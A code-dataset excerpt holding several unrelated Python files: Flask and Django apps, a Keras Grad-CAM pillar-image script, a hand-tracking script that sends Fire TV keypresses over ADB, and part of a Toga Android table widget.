mean_ref = db.Column(db.Float)\n max_mean = db.Column(db.Float)\n\n best_ref_id = db.Column(db.Integer, db.ForeignKey('reference_signature.id'))\n best_ref = db.relationship('ReferenceSignature')\n\n average_vector = db.Column(db.PickleType)\n signature_length_mean = db.Column(db.Float)\n signature_length_deviation = db.Column(db.Float)\n\n def __init__(self, owner):\n \"\"\"\n\n :param Person owner :\n \"\"\"\n self.owner = owner\n self.populate_dtw_chars()\n\n def populate_dtw_chars(self):\n if len(self.owner.reference_singatures) > 4:\n from app.DynamicTimeWarping.DTW import compute_normalizers\n [min_mean, mean_ref, best_ref,\n max_mean, average_vector, signature_length_mean,\n signature_length_deviation] = compute_normalizers(self.owner.reference_singatures)\n self.min_mean = min_mean\n self.mean_ref = mean_ref\n self.best_ref_id = best_ref\n self.max_mean = max_mean\n self.average_vector = average_vector\n self.signature_length_mean = signature_length_mean\n self.signature_length_deviation = signature_length_deviation\n\n @staticmethod\n def create(owner: Person):\n dtw_character = DtwCharacteristics.query.filter_by(owner=owner).first()\n if dtw_character:\n dtw_character.populate_dtw_chars()\n else:\n dtw_character = DtwCharacteristics(owner)\n\n if len(owner.reference_singatures) > 4:\n owner.is_sealed = True\n db.session.merge(dtw_character)\n db.session.merge(owner)\n db.session.commit()\n\n \"\"\"\n multi threaded training of DTW SVM\n \"\"\"\n print(owner)\n owner.reference_singatures\n owner.dtw_char\n\n pool = Pool(processes=1)\n pool.apply_async(SvmInstance.create, (owner, 'DTW'))\n pool.close()\n # SvmInstance.create(owner, 'DTW')\n return dtw_character\n\n\n\nclass SvmInstance(db.Model):\n __tablename__ = 'svm_instances'\n id = db.Column(db.Integer, primary_key=True)\n instance_pickle = db.Column(db.PickleType)\n type = db.Column(db.Enum('DTW', 'iVector', 'RNN'))\n owner_id = db.Column(db.Integer, db.ForeignKey('people.id'))\n owner = db.relationship('Person')\n\n def __init__(self, owner, type):\n self.owner = owner\n self.type = type\n self.populate(type)\n\n def populate(self, type):\n trainer = {\n 'DTW': self.train_dtw_svm,\n 'iVector': self.train_ivector_svm,\n 'RNN': self.train_rnn_svm\n }.get(type, None)\n self.instance_pickle = trainer()\n\n @staticmethod\n def create(owner: Person, type):\n svminstance = SvmInstance.query.filter_by(owner_id=owner.id, type=type).first()\n if not svminstance:\n svminstance = SvmInstance(owner=owner, type=type)\n else:\n svminstance.populate(owner, type)\n db.session.merge(svminstance)\n db.session.commit()\n print(\"DTW SVM trained for owner {name}\".format(name=owner.first_name+' '+owner.last_name))\n\n def train_dtw_svm(self):\n clf = SVC(kernel='rbf', probability=True)\n from app.DynamicTimeWarping.DTW import prepare_svm_vectors_and_labels\n vectors, labels = prepare_svm_vectors_and_labels(self.owner)\n clf.fit(vectors, labels)\n return clf\n\n def train_ivector_svm(self):\n clf = SVC(kernel='rbf', probability=True)\n # @TODO train iVector for owner and save svm\n return clf\n\n def train_rnn_svm(self):\n clf = SVC(kernel='rbf', probability=True)\n # @TODO train RNN for owner and save svm\n return clf\n\n @property\n def SVM(self):\n return pickle.loads(self.instance_pickle)\n\nclass SealException(Exception):\n pass","sub_path":"app/person/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"510461009","text":"from flask import Flask, request, jsonify\r\nimport recommender\r\nimport artifacts.firebase_config\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n@app.route('/', methods=['GET', 'POST'])\r\ndef home():\r\n return 'fs'\r\n\r\n\r\n@app.route('/v1/getSimilarDesigns', methods=['GET', 'POST'])\r\ndef get_similar_designs():\r\n try:\r\n content = request.json\r\n gender = content[\"gender\"]\r\n event = content[\"event\"]\r\n dress_type = content[\"dress_type\"]\r\n article_type = content[\"article_type\"]\r\n img_url = content[\"img_url\"]\r\n res = recommender.get_similar_designs(gender, event, dress_type, article_type, img_url)\r\n if res != -1:\r\n response = jsonify(\r\n payload=str(res),\r\n status=200,\r\n mimetype='application/json'\r\n )\r\n else:\r\n response = jsonify(\r\n payload='No matches',\r\n status=500,\r\n mimetype='application/json'\r\n )\r\n return response\r\n except:\r\n return jsonify(\r\n payload='Server Error',\r\n status=500,\r\n mimetype='application/json'\r\n )\r\n\r\n\r\n@app.route('/v1/getSimilarDesigners', methods=['GET', 'POST'])\r\ndef get_similar_designers():\r\n try:\r\n content = request.json\r\n gender = content[\"gender\"]\r\n event = content[\"event\"]\r\n dress_type = content[\"dress_type\"]\r\n lat = content[\"lat\"]\r\n lng = content[\"lng\"]\r\n res = recommender.get_similar_designers(gender, event, dress_type, lat, lng)\r\n if res != -1:\r\n response = jsonify(\r\n payload=str(res),\r\n status=200,\r\n mimetype='application/json'\r\n )\r\n else:\r\n response = jsonify(\r\n payload='No matches',\r\n status=500,\r\n mimetype='application/json'\r\n )\r\n return response\r\n except:\r\n return jsonify(\r\n payload='Server Error',\r\n status=500,\r\n mimetype='application/json'\r\n )\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"631704137","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 15 13:05:02 2019\r\n\r\n@author: paulo\r\n\"\"\"\r\n\r\n#DATA AUGMENTATION\r\nimport os\r\nimport cv2\r\nimport random\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nimport os\r\nfrom PIL import Image\r\nfrom skimage.color import rgb2gray\r\n\r\nfrom keras.models import load_model\r\nimport tensorflow as tf\r\ntf.compat.v1.disable_eager_execution()\r\nfrom keras.layers import InputLayer\r\nfrom keras.models import Sequential\r\nimport numpy as np\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\n#import cv2\r\nfrom keras import layers\r\nfrom keras import models\r\n\r\nfrom keras.layers import Flatten\r\nfrom keras.layers import Dense\r\n\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.callbacks import ModelCheckpoint\r\nfrom keras.models import Sequential\r\n\r\nfrom keras.applications.vgg16 import VGG16\r\n\r\nfrom vis.losses import ActivationMaximization\r\nfrom vis.regularizers import TotalVariation, LPNorm\r\nfrom vis.input_modifiers import Jitter\r\nfrom vis.optimizer import Optimizer\r\nfrom vis.callbacks import GifGenerator\r\n\r\nimport cv2\r\n\r\nfrom vis.losses import ActivationMaximization\r\nfrom vis.regularizers import TotalVariation, LPNorm\r\nfrom vis.input_modifiers import Jitter\r\nfrom vis.optimizer import Optimizer\r\nfrom vis.callbacks import GifGenerator\r\n\r\nfrom vis.utils import utils\r\n#from keras import activations\r\nfrom keras.preprocessing import image\r\nimport keras\r\nfrom keras.layers import Dropout\r\nfrom keras import backend as K\r\nfrom keras import regularizers\r\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\r\nimport os\r\n\r\n#identifies what is the average size of the pillars images\r\ndef image_size(SERS,NONSERS):\r\n \r\n #get the files inside the folders\r\n SERS_train = os.listdir(SERS)\r\n NONSERS_train = os.listdir(NONSERS)\r\n \r\n all_dir = [SERS, NONSERS]\r\n all_data = [SERS_train, NONSERS_train]\r\n \r\n shape = []\r\n \r\n for dire,file in zip(all_dir, all_data):\r\n \r\n folder = dire.split('/')[-2]+'/'\r\n for f in file:\r\n ima = cv2.imread(dire+f)\r\n shape.append([ima.shape[0],ima.shape[1]])\r\n \r\n return shape\r\n\r\nfrom PIL import Image\r\n#breaks the images in parts shaped like shape vector [x,y]\r\ndef break_image(input_frames,shape):\r\n \r\n if len(shape) == 2:\r\n \r\n height = int(shape[0])\r\n width = int(shape[1])\r\n size = cv2.imread(input_frames).shape[0:2]\r\n \r\n division = [size[0]//height,size[1]//width]\r\n \r\n \r\n else:\r\n \r\n max_shape = np.max(shape,axis=0)\r\n min_shape = np.min(shape,axis=0)\r\n \r\n size = cv2.imread(input_frames).shape[0:2]\r\n \r\n division = np.mean(size)//np.mean([max_shape,min_shape])\r\n \r\n shape_vec = np.mean([max_shape,min_shape],axis=0)\r\n \r\n height = int(shape_vec[0])\r\n width = int(shape_vec[1])\r\n \r\n im = Image.open(input_frames)\r\n imgwidth, imgheight = im.size\r\n test_image = []\r\n \r\n for i in range(0,imgheight,height):\r\n for j in range(0,imgwidth,width):\r\n box = (j, i, j+width, i+height)\r\n a = im.crop(box)\r\n test_image.append(a)\r\n \r\n return test_image,division\r\n\r\n\r\n\r\n\r\n# image = cap[0]\r\n# ADD ALEX SECTION HERE\r\n\r\n\r\n\r\n\r\n#load the pillar identification model\r\n\r\n\r\n \r\ndef generate_regionof_interest(image_identifier,test_image,label):\r\n \r\n \r\n model = Sequential()\r\n for layer in image_identifier.layers:\r\n model.add(layer)\r\n \r\n for layer in model.layers:\r\n layer.trainable = False\r\n \r\n \r\n labels = ['pillar', 'nopillar']\r\n from keras.applications.vgg16 import preprocess_input\r\n from keras.applications.vgg16 import (VGG16, preprocess_input, decode_predictions)\r\n \r\n heatmaps = []\r\n from keras.preprocessing import image\r\n \r\n location = []\r\n #get the activations from the test image broken in pieces\r\n \r\n for cnt,f in enumerate(test_image):\r\n img = f.convert('RGB').resize((150,150), Image.ANTIALIAS)\r\n \r\n x = image.img_to_array(img)\r\n x = np.expand_dims(x, axis=0)\r\n\r\n \r\n preds = model.predict(x)\r\n if preds[0][1]>0.5:\r\n location.append(1)\r\n plt.figure()\r\n plt.imshow(img)\r\n plt.savefig(r'/home/newuser/Desktop/alex/cnn pillars/gen/'+label+str(cnt)+'.png', dpi = 300,bbox_inches=\"tight\")\r\n plt.close()\r\n else:\r\n location.append(0)\r\n \r\n num = np.argmax(preds)\r\n \r\n img_output = model.layers[0].layers[-1].output[:,num]\r\n last_conv_layer = model.layers[0].get_layer('block5_conv3')\r\n \r\n grads = K.gradients(img_output, last_conv_layer.output)[0]\r\n pooled_grads = K.mean(grads, axis= (0,1,2))\r\n # pooled_grads = K.mean(grads, axis= (0,1,2))\r\n \r\n iterate = K.function([ model.layers[0].layers[0].input],\r\n [pooled_grads, last_conv_layer.output[0]])\r\n \r\n pooled_grads_value , conv_layer_output_value = iterate([x])\r\n \r\n for j in range(512):\r\n conv_layer_output_value[:,:,j] *= pooled_grads_value[j]\r\n \r\n \r\n \r\n heatmap = np.mean(conv_layer_output_value , axis=-1)\r\n heatmap = np.maximum(heatmap,0)\r\n heatmap /= np.max(heatmap)\r\n \r\n img = f.convert('RGB').resize((150,150), Image.ANTIALIAS)\r\n \r\n \r\n heatmap = cv2.resize(heatmap, (img.size[1],img.size[0]))\r\n heatmap = np.uint8(255 * heatmap)\r\n heatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_HOT)\r\n heatmap = cv2.cvtColor(heatmap, cv2.COLOR_BGR2RGB)\r\n \r\n \r\n if max(max(img.getextrema()))==0:\r\n img *= np.uint8(255.0/(0.000001+max(max(img.getextrema()))))\r\n else:\r\n img *= np.uint8(255.0/max(max(img.getextrema())))\r\n \r\n \r\n blend = cv2.addWeighted(img,0.5, heatmap,0.5, 0)\r\n heatmaps.append(blend)\r\n \r\n return heatmaps,location\r\n \r\n\r\n\r\n\r\ndef plot_results(test,heatmaps,location,division):\r\n \r\n #plot the test image with heatmaps\r\n \r\n w,h,c=heatmaps[0].shape\r\n iteray = int(division[0])+1\r\n iterax = int(division[1])+1\r\n final_heath = np.zeros(shape=(w*iteray,h*iterax,c))\r\n \r\n for i in range(iteray):\r\n for j in range(iterax): \r\n final_heath[i*w:(i+1)*w,j*h:(j+1)*h,:] = heatmaps[i*iterax+j]*location[i*iterax+j]\r\n \r\n # final_heat = final_heat//final_heat.max()\r\n plt.figure()\r\n plt.imshow(final_heath/255)\r\n \r\n \r\n import pandas as pd\r\n \r\n #perfect the mask into a square, filling up all previous area\r\n \r\n mask = pd.DataFrame(np.array(location).reshape(iteray,iterax))\r\n locx = []\r\n locy = []\r\n \r\n for i in range(mask.shape[0]):\r\n for j in range(mask.shape[1]):\r\n if mask.iloc[i,j] == 1:\r\n locx.append(i)\r\n locy.append(j)\r\n \r\n mask_fill = pd.DataFrame(np.zeros((iteray,iterax)))\r\n \r\n for i in range(mask.shape[0]):\r\n for j in range(mask.shape[1]):\r\n if (i>np.min(locx)-1 and inp.min(locy)-1 and j0.5:\r\n location.append(1)\r\n plt.figure()\r\n plt.imshow(img)\r\n plt.savefig(r'/home/newuser/Desktop/alex/cnn pillars/gen/'+label+str(cnt)+'.png', dpi = 300,bbox_inches=\"tight\")\r\n plt.close()\r\n else:\r\n location.append(0)\r\n \r\n \r\n \r\n img_output = model.layers[0].layers[-1].output[:,num]\r\n last_conv_layer = model.layers[0].get_layer('block5_conv3')\r\n \r\n grads = K.gradients(img_output, last_conv_layer.output)[0]\r\n pooled_grads = K.mean(grads, axis= (0,1,2))\r\n # pooled_grads = K.mean(grads, axis= (0,1,2))\r\n \r\n iterate = K.function([ model.layers[0].layers[0].input],\r\n [pooled_grads, last_conv_layer.output[0]])\r\n \r\n pooled_grads_value , conv_layer_output_value = iterate([x])\r\n \r\n for j in range(512):\r\n conv_layer_output_value[:,:,j] *= pooled_grads_value[j]\r\n \r\n \r\n \r\n heatmap = np.mean(conv_layer_output_value , axis=-1)\r\n heatmap = np.maximum(heatmap,0)\r\n heatmap /= np.max(heatmap)\r\n \r\n img = f.convert('RGB').resize((150,150), Image.ANTIALIAS)\r\n \r\n \r\n heatmap = cv2.resize(heatmap, (img.size[1],img.size[0]))\r\n heatmap = np.uint8(255 * heatmap)\r\n heatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_HOT)\r\n heatmap = cv2.cvtColor(heatmap, cv2.COLOR_BGR2RGB)\r\n \r\n \r\n if max(max(img.getextrema()))==0:\r\n img *= np.uint8(255.0/(0.000001+max(max(img.getextrema()))))\r\n else:\r\n img *= np.uint8(255.0/max(max(img.getextrema())))\r\n \r\n \r\n blend = cv2.addWeighted(img,0.5, heatmap,0.5, 0)\r\n heatmaps.append(blend)\r\n \r\n return heatmaps,location\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#actual pillar size\r\n\r\n# size2 = image_size(r'/home/newuser/Desktop/emily try/Data3_2122points/original folder/SERS/',\r\n # r'/home/newuser/Desktop/emily try/Data3_2122points/original folder/nonSERS/')\r\n\r\nsize2 = [50,50]\r\n\r\nnewcropped = cropped[:,1000:,:]\r\n\r\ntest_image2,division2 = break_image2(newcropped,size2)\r\n\r\nsers_identifier = load_model(r'/home/newuser/Desktop/emily try/Data4last/SERS_NOSERS_pillars_v05.h5')\r\n\r\n\r\n\r\nheatmaps2,location2 = generate_regionof_interest2(sers_identifier,test_image2,'sers_notsers')\r\n#plots heatmap activation over the initial test sample, plots over test image the complete reconstructed activation region.\r\nfinal_heat2 = plot_results2(newcropped,heatmaps2,division2,location2)\r\n\r\n\r\n \r\n # return True\r\n\r\n# pillar_locator(image_identifier, test_image)\r\n\r\n\r\n\r\n#load first model to identify where the pillars are situated in an image\r\n# test = r'/home/newuser/Desktop/alex/cnn pillars/test/test.jpg'\r\n# image_break,division = break_image(test,[150,150])\r\n\r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n# classifier = load_model(r'/home/newuser/Desktop/alex/SERS_NOSERS_pillars_v05.h5')\r\n\r\n# model = Sequential()\r\n# # model.add(InputLayer(input_shape=(150,150)))\r\n# for layer in classifier.layers:\r\n# model.add(layer)\r\n\r\n# for layer in model.layers:\r\n# layer.trainable = False\r\n\r\n# labels = ['pillar', 'notpillar']\r\n# from keras.applications.vgg16 import preprocess_input\r\n# from keras.applications.vgg16 import (VGG16, preprocess_input, decode_predictions)\r\n\r\n# heatmaps = []\r\n# from keras.preprocessing import image\r\n\r\n# for f in test_image:\r\n\r\n# img = f.convert('RGB').resize((150,150), Image.ANTIALIAS)\r\n \r\n# x = image.img_to_array(img)\r\n# x = np.expand_dims(x, axis=0)\r\n# # x = preprocess_input(x)\r\n \r\n# preds = model.predict(x)\r\n \r\n# if preds[0][1]>0.5:\r\n# plt.figure()\r\n# plt.imshow(img)\r\n \r\n\r\n \r\n# color = []\r\n# num = np.argmax(preds)\r\n \r\n \r\n# if num == 0:\r\n# color.append(['r','k'])\r\n# if num == 1:\r\n# color.append(['k','r'])\r\n\r\n \r\n# #output from the conv net and not from the pooling... \r\n \r\n \r\n# img_output = model.layers[0].layers[-1].output[:,num]\r\n# last_conv_layer = model.layers[0].get_layer('block5_conv3')\r\n \r\n# grads = K.gradients(img_output, last_conv_layer.output)[0]\r\n# pooled_grads = K.mean(grads, axis= (0,1,2))\r\n# # pooled_grads = K.mean(grads, axis= (0,1,2))\r\n \r\n# iterate = K.function([ model.layers[0].layers[0].input],\r\n# [pooled_grads, last_conv_layer.output[0]])\r\n \r\n# pooled_grads_value , conv_layer_output_value = iterate([x])\r\n \r\n# for j in range(512):\r\n# conv_layer_output_value[:,:,j] *= pooled_grads_value[j]\r\n \r\n \r\n \r\n# heatmap = np.mean(conv_layer_output_value , axis=-1)\r\n# heatmap = np.maximum(heatmap,0)\r\n# heatmap /= np.max(heatmap)\r\n \r\n# img = f.convert('RGB').resize((150,150), Image.ANTIALIAS)\r\n\r\n \r\n# heatmap = cv2.resize(heatmap, (img.size[1],img.size[0]))\r\n# heatmap = np.uint8(255 * heatmap)\r\n# heatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_HOT)\r\n# heatmap = cv2.cvtColor(heatmap, cv2.COLOR_BGR2RGB)\r\n\r\n# img *= np.uint8(255.0/max(max(img.getextrema())))\r\n\r\n# blend = cv2.addWeighted(img,0.5, heatmap,0.5, 0)\r\n# heatmaps.append(blend)\r\n \r\n\r\n\r\n# # for h in heatmaps:\r\n# # fig, ax = plt.subplots()\r\n# # plt.axis('off')\r\n# # im = ax.imshow(h,interpolation='lanczos',cmap='hot')\r\n# # divider = make_axes_locatable(ax)\r\n# # cax = divider.append_axes(\"right\", size=\"5%\", pad=0.25) \r\n \r\n# # range_b = [blend.min(), np.mean([h.max(),h.min()]), h.max()]\r\n \r\n# # cbar = fig.colorbar(im, cax=cax, ticks=range_b, orientation='vertical')\r\n# # cbar.ax.set_yticklabels(['Low', 'Medium', 'High'], fontdict={'fontsize': 18, 'fontweight': 'medium'}) # horizontal colorbar\r\n\r\n# w,h,c=heatmaps[0].shape\r\n# itera = int(division)+1\r\n# final_heat = np.zeros(shape=(w*itera,h*itera,c))\r\n\r\n# for i in range(itera):\r\n# for j in range(itera): \r\n# final_heat[i*w:(i+1)*w,j*h:(j+1)*h,:] = heatmaps[i*itera+j]\r\n \r\n# # final_heat = final_heat//final_heat.max()\r\n# plt.imshow(final_heat/final_heat.max())\r\n \r\n \r\n\r\n\r\n","sub_path":"find_max_sized_image_v03.py","file_name":"find_max_sized_image_v03.py","file_ext":"py","file_size_in_byte":19203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"616193763","text":"import csv\n\ndef calculateAvgHwy(file_path):\n output = {}\n with open(file_path, 'rb') as csvfile:\n lines = [row for row in csv.reader(csvfile, delimiter=',')]\n\n for y in set([str(i[11]) for i in lines[1:]]): # Itereate over vehicle class and set them\n val = [int(x[9]) for x in lines[1:] if x[11] == y] # val = hwy mpg of given vehicle class\n output[y] = sum(val) / float(len(val)) # avg of mpg for given vehicle class\n\n return output\n\n\n\ncalculateAvgHwy('./files/mpg.csv')\n","sub_path":"hwy_mpg.py","file_name":"hwy_mpg.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"363262838","text":"from django.forms import Textarea\n\n\nclass RedactorTextarea(Textarea):\n class Media:\n css = {'all': ('redactor/redactor.css',)}\n js = (\n 'animal3/jquery-1.9.1.min.js',\n 'redactor/redactor.js', 'redactor/setup.js')\n\n def __init__(self, attrs=None, **kwargs):\n class_name = attrs.get('class', '')\n redactor_class = class_name and \" redactor\" or \"redactor\"\n class_name += redactor_class\n attrs['class'] = class_name\n super(RedactorTextarea, self).__init__(attrs)\n\n def render(self, name, value, attrs=None):\n return super(RedactorTextarea, self).render(name, value, attrs)\n","sub_path":"source/catalogue/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"25494041","text":"import math\nimport typing\n\n\ndef draw_rectangle(\n ctx,\n x: int,\n y: int,\n width: int,\n height: int,\n border_radius: int,\n border_size: int,\n color: list[int],\n border_color: list[int] | None,\n) -> None:\n ctx.set_source_rgba(color[0] / 255, color[1] / 255, color[2] / 255, color[3])\n if border_radius > 0:\n corner_radius = border_radius\n\n radius = corner_radius\n degrees = math.pi / 180.0\n\n ctx.new_sub_path()\n ctx.arc(x + width - radius, y + radius, radius, -90 * degrees, 0 * degrees)\n ctx.arc(\n x + width - radius, y + height - radius, radius, 0 * degrees, 90 * degrees\n )\n ctx.arc(x + radius, y + height - radius, radius, 90 * degrees, 180 * degrees)\n ctx.arc(x + radius, y + radius, radius, 180 * degrees, 270 * degrees)\n ctx.close_path()\n\n ctx.fill_preserve()\n if border_size != 0:\n ctx.set_source_rgba(\n border_color[0] / 255,\n border_color[1] / 255,\n border_color[2] / 255,\n border_color[3],\n )\n ctx.set_line_width(border_size)\n ctx.stroke()\n else:\n ctx.rectangle(x, y, width, height)\n if border_size != 0:\n ctx.fill_preserve()\n ctx.set_source_rgba(\n border_color[0] / 255,\n border_color[1] / 255,\n border_color[2] / 255,\n border_color[3],\n )\n ctx.set_line_width(border_size)\n ctx.stroke()\n else:\n ctx.fill()\n return None\n","sub_path":"dot_config/i3/xborder/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"380110634","text":"import cv2 as cv\r\nimport numpy as np\r\nimport HandtrackingModule as Handtrack\r\nimport time\r\nimport subprocess\r\nimport PySimpleGUI as sg\r\nimport math\r\n\r\ndef rescale_frame(frame, percent=75):\r\n width = int(frame.shape[1] * percent/ 100)\r\n height = int(frame.shape[0] * percent/ 100)\r\n dim = (width, height)\r\n return cv.resize(frame, dim, interpolation =cv.INTER_AREA)\r\n\r\n#====================================================================================\r\n\r\ndef my_main():\r\n ExecuteThisAdb(\"adb disconnect\")\r\n ExecuteThisAdb(\"adb connect 192.168.43.6:5555\")\r\n\r\ndef UP():\r\n ExecuteThisAdb(\"adb shell input keyevent 19\")\r\n\r\ndef DOWN():\r\n ExecuteThisAdb(\"adb shell input keyevent 20\")\r\n\r\ndef LEFT():\r\n ExecuteThisAdb(\"adb shell input keyevent 21\")\r\n\r\ndef RIGHT():\r\n ExecuteThisAdb(\"adb shell input keyevent 22\")\r\n\r\ndef ExecuteThisAdb(Code):\r\n cmd = subprocess.Popen(Code, stdout = subprocess.PIPE, stderr = None, shell=True)\r\n print(cmd.communicate()[0]) \r\n\r\n#====================================================================================\r\n\r\nwidth, height = 1920,1080\r\n\r\nCapture = cv.VideoCapture(1)\r\nCapture.set(3,width)\r\nCapture.set(4,height)\r\n\r\npTime = 0\r\n\r\ndetector = Handtrack.handDetector(detectionCon=0.1)\r\n\r\nleft_rect_coord = []\r\nright_rect_coord = []\r\nup_rect_coord = []\r\ndown_rect_coord = []\r\n\r\n\r\nfor i in range(0, 200):\r\n for j in range(400,880):\r\n left_rect_coord.append((i,j))\r\n\r\nfor i in range(1520,1920):\r\n for j in range(200,880):\r\n right_rect_coord.append((i,j))\r\n\r\nfor i in range(410,1510):\r\n for j in range(0,250):\r\n up_rect_coord.append((i,j))\r\n\r\nfor i in range(410, 1510):\r\n for j in range(830,1080):\r\n down_rect_coord.append((i,j))\r\n\r\nmy_main()\r\n\r\nwhile True:\r\n \r\n success, frame = Capture.read()\r\n \r\n frame = detector.findHands(frame)\r\n #Draw Rectangles\r\n \r\n #left triangle\r\n cv.rectangle(frame, (0, 200), (400,880), (0,255,0), 1)\r\n \r\n #right triangle\r\n cv.rectangle(frame, (1520,200), (1920,880), (0,255,0), 1)\r\n \r\n #up triangle\r\n cv.rectangle(frame, (410,0), (1510,250), (0,255,0), 1)\r\n\r\n #down traingle\r\n cv.rectangle(frame, (410, 830), (1510,1080), (0,255,0), 1)\r\n\r\n\r\n list_of_positions = detector.findPosition(frame, draw=False)\r\n \r\n if len(list_of_positions) > 20:\r\n thumb = [list_of_positions[4][1], list_of_positions[4][2]]\r\n first_finger = (list_of_positions[8][1], list_of_positions[8][2])\r\n second_finger = (list_of_positions[12][1], list_of_positions[12][2])\r\n third_finger = (list_of_positions[16][1], list_of_positions[16][2])\r\n fourth_finger = (list_of_positions[20][1], list_of_positions[20][2])\r\n\r\n cv.circle(frame, (thumb[0],thumb[1]), 15, (255,0,255), cv.FILLED)\r\n cv.circle(frame, (first_finger[0],first_finger[1]), 15, (255,0,255), cv.FILLED)\r\n cv.circle(frame, (second_finger[0],second_finger[1]), 15, (255,0,255), cv.FILLED)\r\n cv.circle(frame, (third_finger[0],third_finger[1]), 15, (255,0,255), cv.FILLED)\r\n cv.circle(frame, (fourth_finger[0],fourth_finger[1]), 15, (255,0,255), cv.FILLED)\r\n\r\n \r\n if first_finger in left_rect_coord:\r\n LEFT()\r\n\r\n if second_finger in right_rect_coord:\r\n RIGHT()\r\n\r\n if third_finger in up_rect_coord:\r\n UP()\r\n\r\n if fourth_finger in down_rect_coord:\r\n DOWN()\r\n\r\n\r\n cTime = time.time()\r\n fps = 1/(pTime-cTime)\r\n pTime = cTime\r\n cv.putText(frame, f'FPS: {int(fps)}', (40,50), cv.FONT_HERSHEY_COMPLEX, 1, (255,0,0), 3)\r\n frame75 = rescale_frame(frame)\r\n cv.imshow(\"hand detection\", frame75) \r\n if cv.waitKey(20) & 0Xff==ord(' '):\r\n break\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n","sub_path":"Control FireTV with Hand/MyTracking.py","file_name":"MyTracking.py","file_ext":"py","file_size_in_byte":3746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"129624160","text":"from django.test import TestCase\nfrom django.test import Client\n\nimport os, zipfile\n\nfrom .models import SymbolsUpload\n\ndef get_test_file_path(file_name):\n dir = os.path.dirname(__file__)\n return os.path.join(dir, \"testdata/%s\" % (file_name))\n\nclass TestSimpleSymbolsUpload(TestCase):\n\n def test_symbols_upload_valid_zip(self):\n c = Client()\n comment = 'Test Comment'\n with open(get_test_file_path(\"valid.zip\")) as f:\n response = c.post('/upload/', {'symbols':f, 'comment': comment})\n self.assertEqual(response.status_code, 200)\n uploaded_symbols = SymbolsUpload.objects.all()\n self.assertEqual(len(uploaded_symbols), 1)\n uploaded_symbol = uploaded_symbols[0]\n self.assertEqual(uploaded_symbol.comment, comment)\n self.assertListEqual(uploaded_symbol.files.splitlines(), ['file1', 'file2'])\n\n def test_sybols_upload_invalid_zip(self):\n c = Client()\n with open(get_test_file_path(\"invalid.zip\")) as f:\n with self.assertRaises(zipfile.BadZipfile):\n response = c.post('/upload/', {'symbols': f, 'comment': 'Test Comment'})\n\n def test_missing_comment(self):\n c = Client()\n with open(get_test_file_path(\"valid.zip\")) as f:\n response = c.post('/upload/', {'symbols':f})\n self.assertEqual(response.status_code, 405)\n\n def test_missing_file(self):\n c = Client()\n response = c.post('/upload/', {'comment': 'test comment'})\n self.assertEqual(response.status_code, 405)\n","sub_path":"django/crashreport/symbols/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"272071409","text":"from travertino.size import at_least\n\nfrom ..libs.activity import MainActivity\nfrom ..libs.android import R__attr\nfrom ..libs.android.graphics import Typeface\nfrom ..libs.android.view import Gravity, OnClickListener, View__MeasureSpec\nfrom ..libs.android.widget import (\n HorizontalScrollView,\n LinearLayout,\n LinearLayout__LayoutParams,\n ScrollView,\n TableLayout,\n TableLayout__Layoutparams,\n TableRow,\n TableRow__Layoutparams,\n TextView,\n)\nfrom .base import Widget\n\n\nclass TogaOnClickListener(OnClickListener):\n def __init__(self, impl):\n super().__init__()\n self.impl = impl\n\n def onClick(self, view):\n tr_id = view.getId()\n row = self.impl.interface.data[tr_id]\n if self.impl.interface.multiple_select:\n if tr_id in self.impl.selection:\n self.impl.selection.pop(tr_id)\n view.setBackgroundColor(self.impl.color_unselected)\n else:\n self.impl.selection[tr_id] = row\n view.setBackgroundColor(self.impl.color_selected)\n else:\n self.impl.clear_selection()\n self.impl.selection[tr_id] = row\n view.setBackgroundColor(self.impl.color_selected)\n if self.impl.interface.on_select:\n self.impl.interface.on_select(self.impl.interface, row=row)\n\n\nclass Table(Widget):\n table_layout = None\n color_selected = None\n color_unselected = None\n selection = {}\n _deleted_column = None\n _font_impl = None\n\n def create(self):\n # get the selection color from the current theme\n current_theme = MainActivity.singletonThis.getApplication().getTheme()\n attrs = [R__attr.colorBackground, R__attr.colorControlHighlight]\n typed_array = current_theme.obtainStyledAttributes(attrs)\n self.color_unselected = typed_array.getColor(0, 0)\n self.color_selected = typed_array.getColor(1, 0)\n typed_array.recycle()\n\n parent = LinearLayout(self._native_activity)\n parent.setOrientation(LinearLayout.VERTICAL)\n parent_layout_params = LinearLayout__LayoutParams(\n LinearLayout__LayoutParams.MATCH_PARENT,\n LinearLayout__LayoutParams.MATCH_PARENT,\n )\n parent_layout_params.gravity = Gravity.TOP\n parent.setLayoutParams(parent_layout_params)\n vscroll_view = 